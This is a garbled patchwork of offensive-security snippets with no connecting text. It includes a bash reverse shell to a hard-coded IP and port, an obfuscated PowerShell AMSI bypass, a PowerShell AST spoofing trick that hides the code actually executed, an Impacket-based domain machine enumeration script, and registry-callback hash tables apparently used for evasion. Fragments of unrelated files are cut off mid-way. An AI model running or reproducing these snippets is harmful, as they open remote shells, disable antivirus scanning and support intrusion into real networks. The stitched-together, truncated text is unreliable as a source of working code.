netsh
rpc filter
add rule layer=um actiontype=block
add condition field=if_uuid matchtype=equal data=12345678-1234-ABCD-EF00-0123456789AB
add filter
add rule layer=um actiontype=block
add condition field=if_uuid matchtype=equal data=c681d488-d850-11d0-8c52-00c04fd90f7e
bash -i >& /dev/tcp/192.168.1.23/6666 0>&1
$SpoofedAst = [ScriptBlock]::Create("Write-Output 'Hello'").Ast
$ExecutedAst = [ScriptBlock]::Create("Write-Output 'My Hidden Hello Hidden'").Ast
$Ast = [System.Management.Automation.Language.ScriptBlockAst]::new($SpoofedAst.Extent,$null,$null,$null,$ExecutedAst.EndBlock.Copy(),$null)
$Sb = $Ast.GetScriptBlock()
& $Sb
Add NugetComponent Microsoft.Win32.Registry
Add NugetComponent System.Security.Cryptography.ProtectedData
Program.cs based on https://github.com/sergeig888/csharp-dpapi-PBIE/
Tested on latest version Kiteworks 8.3.0
=========================================
/* Created by Sergei Gundorov 1/2/2020
 * Intent: provide sample project for encrypting secrets with DPAPI while working with
 * Power BI Embedded and API tutorials and samples.
import requests
import json
# Proxy settings for debugging (with Burp or another intercepting proxy)
proxy_enable = False
proxy = {
    'http': 'http://127.0.0.1:8080',
    'https': 'http://127.0.0.1:8080'
}
#!/usr/bin/env python
# modifications of original script GetADUsers.py from Impacket.
# this version returns the list of machines seen in the last 24h
#python list_machines.py TIMATEC.local/fbu -dc-ip 192.168.16.11
#Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
#
#Password:
#[*] Querying 192.168.16.11 for information about domain.
#Name PasswordLastSet LastLogon OperatingSystemVersion OperatingSystem IP Address
#-------------------- -------------------------- -------------------------- ---------------------- --------------------------------------- ------------
#!/usr/bin/env python
from __future__ import print_function
import json
import re
import socket
import ssl
import subprocess
import sys
'ntdll.dll' '4097367' '0x3e8557'
'RegNtCallbackObjectContextCleanup' '1094975913383384674' '0xf3222cab2d35662'
'RegNtPostCreateKey' '76320549262' '0x11c50f298e'
'RegNtPostCreateKeyEx' '686884943685' '0x9fed887745'
'RegNtPostDeleteKey' '76320533467' '0x11c50eebdb'
'RegNtPostDeleteValueKey' '18545889663766' '0x10de0d2a5b16'
'RegNtPostEnumerateKey' '2060655325624' '0x1dfc8a0f1b8'
'RegNtPostEnumerateValueKey' '500739244157917' '0x1c76b70c5ebdd'
'RegNtPostFlushKey' '25440190120' '0x5ec5a7ea8'
'RegNtPostKeyHandleClose' '18545901133010' '0x10de0dd95cd2'
Scraped from the official web site: https://downloads.rclone.org/v.../SHA1SUMS
===========================================================================
Windows Clients
Write-Host '[+] Loading AMSI Bypass...'
S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x')) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U')+'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"(${n`ULl},${t`RuE} )
Write-Host '[+] done' -ForegroundColor green